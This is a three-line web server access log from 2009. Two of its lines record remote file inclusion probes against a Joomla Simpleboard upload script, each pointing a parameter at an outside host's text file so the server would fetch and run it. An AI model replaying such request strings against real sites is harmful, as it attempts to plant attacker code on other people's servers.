208.106.72.126 - - [15/Jun/2009:00:33:14 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
62.128.135.52 - - [15/Jun/2009:00:33:56 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
62.128.135.52 - - [15/Jun/2009:00:33:57 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
